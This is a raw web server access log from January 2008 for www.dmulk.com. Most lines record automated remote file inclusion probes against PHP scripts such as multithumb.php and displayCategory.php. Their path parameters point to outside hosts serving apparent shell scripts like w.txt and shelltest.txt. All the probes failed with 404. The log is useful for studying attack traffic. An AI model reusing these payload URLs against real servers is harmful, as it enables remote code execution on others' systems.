207.44.246.45 - - [25/Jan/2008:07:12:26 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:12:31 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:07:12:39 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:07:12:39 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:07:12:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.137 - - [25/Jan/2008:07:12:59 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.148.95.149 - - [25/Jan/2008:07:13:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.usipime.com/adpics/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.148.95.149 - - [25/Jan/2008:07:13:55 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.usipime.com/adpics/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:14:47 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:14:47 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:14:49 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:16:11 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:16:11 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:07:16:17 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:07:16:17 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:07:16:17 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:16:26 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:16:26 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:16:26 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:16:31 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:04 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:04 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:05 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:05 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:12 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:13 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:13 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:13 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:34 -0800] "GET /logs//config.inc.php?path_escape=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:34 -0800] "GET /logs//config.inc.php?path_escape=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:38 -0800] "GET //config.inc.php?path_escape=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:17:38 -0800] "GET //config.inc.php?path_escape=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:18:40 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:18:40 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:18:45 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:18:45 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
67.195.44.102 - - [25/Jan/2008:07:18:53 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:18:55 -0800] "GET /logs/access.log//includes/functions_admin.php?phpbb_root_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:18:56 -0800] "GET //includes/functions_admin.php?phpbb_root_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:19:00 -0800] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:07:19:36 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:07:19:48 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:20:07 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:20:33 -0800] "GET //index.php?skin_file=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:20:33 -0800] "GET /logs//index.php?skin_file=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:20:33 -0800] "GET //index.php?skin_file=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:07:20:33 -0800] "GET /logs//index.php?skin_file=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:21:01 -0800] "GET //config.inc.php?path_escape=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:21:02 -0800] "GET /logs//config.inc.php?path_escape=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:21:07 -0800] "GET //config.inc.php?path_escape=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:07:21:07 -0800] "GET /logs//config.inc.php?path_escape=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.18.141.2 - - [25/Jan/2008:07:21:38 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.141.2 - - [25/Jan/2008:07:21:38 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.141.2 - - [25/Jan/2008:07:21:38 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
41.249.1.68 - - [25/Jan/2008:07:22:16 -0800] "GET /logs/access_080109.log HTTP/1.1" 200 524288 "http://www.google.com/search?q=ftp:+216.81&hl=fr&lr=&rls=WZPA,WZPA:2008-04,WZPA:en&start=90&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.dmulk.com"
85.214.89.144 - - [25/Jan/2008:07:23:00 -0800] "GET /index.php?mosConfig_absolute_path=http://www.portailromand.ch/components/com_content/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:23:02 -0800] "GET //index.php?skin_file=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:23:06 -0800] "GET /logs//index.php?skin_file=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:23:06 -0800] "GET /logs//index.php?skin_file=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:23:07 -0800] "GET //index.php?skin_file=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:23:54 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:23:54 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:23:55 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:25:09 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:25:09 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:25:09 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.89.144 - - [25/Jan/2008:07:25:40 -0800] "GET /index.php?mosConfig_absolute_path=http://www.portailromand.ch/components/com_content/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:27:22 -0800] "GET /logs/access.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:27:23 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:27:29 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:27:29 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:27:29 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:27:29 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:07:27:53 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.113 - - [25/Jan/2008:07:29:03 -0800] "GET /logs/access_070902.log HTTP/1.0" 200 22717 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:29:19 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:29:19 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:29:20 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.94 - - [25/Jan/2008:07:30:11 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.208 - - [25/Jan/2008:07:31:24 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:31:52 -0800] "GET /minamijewelry/html/about.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:32:24 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.18.141.2 - - [25/Jan/2008:07:32:38 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:33:11 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:33:12 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:33:12 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:34:13 -0800] "GET /logs/access_070819.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:34:28 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:35:38 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:35:39 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:35:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:36:00 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:36:00 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:36:01 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:37:41 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:37:41 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:37:41 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:39:03 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:39:20 -0800] "GET /retreat1/webcam/ HTTP/1.1" 200 2596932 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:39:59 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:40:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:40:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:40:57 -0800] "GET /tmp/ HTTP/1.1" 200 831 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:41:06 -0800] "GET /logs/access_070823.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
219.94.145.104 - - [25/Jan/2008:07:41:15 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [25/Jan/2008:07:41:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [25/Jan/2008:07:41:15 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:07:41:23 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
